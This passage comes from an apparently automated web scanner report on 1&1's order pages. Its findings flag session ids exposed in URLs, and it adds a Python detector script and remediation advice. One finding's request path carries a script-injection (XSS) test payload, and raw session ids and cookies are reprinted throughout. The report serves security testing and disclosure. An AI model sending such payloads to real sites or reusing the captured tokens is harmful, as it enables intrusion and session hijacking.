<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-developer-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-beginner-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-home-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-developer-package-bundle"><span>
...[SNIP]...
<td class="feature-banner" colspan="5"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=590,screenX=100,screenY=100');" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><img src="/common/img/components/hosting/vis_softwarebundle.png" alt="Adobe Dreamweaver" class="software alphapng" width="98" height="66">
...[SNIP]...
<td class="feature-banner-link" colspan="5"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">New Features for Linux packages</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Included Domains
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainPdr;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Private Domain Registration
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDns;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
DNS Management
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Control Panel
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseDatabase;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebDatabase
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseAccess;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Access Database Supported
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseMssql;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
MS SQL Database
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailEmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
E-mail Accounts
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailWebmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebMail 2.0
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailVirusscan;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Spam Filter
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebsiteBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Adobe&reg; Dreamweaver&reg; CS4</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">NetObjects Fusion&reg; 1&amp;1 Edition</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingAsp;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Active Server Pages (ASP)
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingNet;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
ASP.net 3.5/.NET Framework
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDsc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
DynamicSiteCreator
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Photo Gallery
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Spreadshirt Merchandising
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
iStockphoto image library
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingElements;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 FormBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingContentmoduls;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Dynamic Content Catalog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Maps
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDriving;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Directions
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCgi;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Ready-to-Run CGI Library
</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureToolsRatepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
RatePoint
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Google&#8482; AdWords**
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrCitysearch;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Citysearch&reg;
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrSesub;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Simple Submission
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrStat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebStatistics
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMailinglist;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Mailing List
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsNewsletter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 E-mail Marketing Tool
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingRss;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Easy RSS
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsChat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Chat Channels
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsDialogue;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
In2site Live Dialogue
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSecurityCertificate;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
GeoTrust Dedicated SSL Certificate
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureGuaranteeMoneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
90-Day Money Back Guarantee
</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p>** See <a rel="height=350, width=665" class="window-open" href="/xml/order/popupTcGoogleAdwords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">T&amp;C</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=MsHosting&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.85. http://order.1and1.com/xml/order/MsHosting

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The URL in the request carries a session token, here as the ;jsessionid= path parameter rather than in the query string:

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.86. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

Issue detail

The URL in the request carries a session token, here as the ;jsessionid= path parameter rather than in the query string:

Request

GET /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e;jsessionid=8AC1FFB321E88045E58D20D05D6B2648.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://burp/show/16
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCoeJlZ2PC8wLCswLSosJiYkJig=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:5:AAABLtRV*lKZz6xm29DD7n8Tbz9KytaA:1300642527826; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; __PFIX_TST_=5b6bb06549f8a000

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 17:36:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1439

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>1&amp;1 Internet AG - Page or Document not found</title>
<meta h
...[SNIP]...
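Issues 3.84 through 3.87 are all the same finding seen from two sides: the request-target carries a ;jsessionid= path parameter (3.85, 3.86), and the server then rewrites every link in the page with the same id (3.84, 3.87). The script below is an added check, not part of the XSS.CX/Burp report and not 1&1 code; it reproduces both detections on a constructed sample modelled on the 3.84 response with a made-up session id. The path-parameter regex, the list of query-string keys treated as session tokens, and the sample request line and HTML are assumptions made for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Servlet-container URL rewriting puts the session id in a path parameter:
#   /xml/order/Home;jsessionid=<hex id>[.<route suffix>]?query
# The route suffix (".TCpfix140a" in the report) is optional. Assumed pattern.
SESSION_PATH_PARAM = re.compile(r";jsessionid=([0-9A-Fa-f]+)(?:\.[\w-]+)?", re.IGNORECASE)

# Query-string keys commonly used to carry a session token. Assumed list; extend per target.
SESSION_QUERY_KEYS = {"jsessionid", "phpsessid", "sessionid", "session_id", "sid", "aspsessionid"}


def session_tokens_in_url(url):
    """Return [(where, token), ...] for session tokens found in a URL.

    'where' is "path" for a ;jsessionid= path parameter and "query" for a
    query-string key listed in SESSION_QUERY_KEYS. Relative and absolute URLs both work.
    urlsplit (not urlparse) is used so the ;params stay attached to the path.
    """
    parts = urlsplit(url)
    found = []
    m = SESSION_PATH_PARAM.search(parts.path)
    if m:
        found.append(("path", m.group(1)))
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() in SESSION_QUERY_KEYS:
            found.extend(("query", v) for v in values)
    return found


def request_target_tokens(request_line):
    """Check the request-target of an HTTP request line, e.g. "GET /path;jsessionid=... HTTP/1.1"."""
    _method, target, _version = request_line.split(" ", 2)
    return session_tokens_in_url(target)


class _LinkExtractor(HTMLParser):
    """Collect href/src/action attribute values; HTMLParser unescapes &amp; in attributes for us."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src", "action") and value:
                self.links.append(value)


def links_with_session_tokens(html):
    """Return [(link, tokens), ...] for every link in the HTML that carries a session token."""
    parser = _LinkExtractor()
    parser.feed(html)
    parser.close()
    out = []
    for link in parser.links:
        toks = session_tokens_in_url(link)
        if toks:
            out.append((link, toks))
    return out


# Constructed sample modelled on the 3.84 request and response; the session id is made up.
SAMPLE_REQUEST_LINE = (
    "GET /xml/order/MsHosting;jsessionid=0123456789ABCDEF0123456789ABCDEF.TCpfix140a"
    "?__frame=_top&__lf=Static HTTP/1.1"
)
SAMPLE_HTML = """<html><body>
<a class="core_button_normal" href="/xml/order/Home;jsessionid=0123456789ABCDEF0123456789ABCDEF.TCpfix140a?__frame=_top&amp;__lf=Static">Home</a>
<a class="core_button_normal" href="/xml/order/Hosting?__frame=_top&amp;__lf=Static">Linux Hosting</a>
<form action="/login?PHPSESSID=deadbeefcafe"><input type="submit" value="Go"></form>
</body></html>"""


if __name__ == "__main__":
    print("request-target:", request_target_tokens(SAMPLE_REQUEST_LINE))
    for link, toks in links_with_session_tokens(SAMPLE_HTML):
        print("leaking link:", link, toks)
```

Run it over a saved response body and the request line from a proxy log to get the same list Burp prints under "Issue detail". The reason the finding is rated Medium rather than informational: a token in the URL is written to browser history, proxy and server access logs, and to the Referer header of any off-site link or third-party resource the page loads, and if the container also accepts an id it did not itself issue, an attacker can hand a victim a link with a chosen id (session fixation). On a Servlet 3.0 or later container the rewriting is switched off with <session-config><tracking-mode>COOKIE</tracking-mode></session-config> in web.xml, after which the container never emits ;jsessionid= links; the session cookie should then carry HttpOnly and, where the site is served over HTTPS, Secure.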

3.87. http://order.1and1.com/xml/order/News

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:15 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=AZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:52:22 GMT; Path=/
ETag: edde5942d29d19678a705797aa76065e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28632


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=News&amp;linkOrigin=News&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=News&amp;page=switch&amp;linkOrigin=News&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
